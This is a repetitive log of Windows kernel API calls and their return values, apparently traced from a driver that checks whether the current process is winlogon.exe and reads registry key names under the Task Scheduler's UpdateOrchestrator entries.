| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x132, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x130, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x130, ObjectNameInfo_unk_out = 0xffffe0003a785c30, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x132, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x130, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x130, ObjectNameInfo_unk_out = 0xffffe0003a785c30, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8e80830, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8e80830, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x132, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8e80830, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8e80830, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x130, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8e80830, Length = 0x130, ObjectNameInfo_unk_out = 0xffffe0003a785c30, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x132, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x130, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x130, ObjectNameInfo_unk_out = 0xffffe0003a785c30, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x132, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x130, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x130, ObjectNameInfo_unk_out = 0xffffe0003a785c30, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x132, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
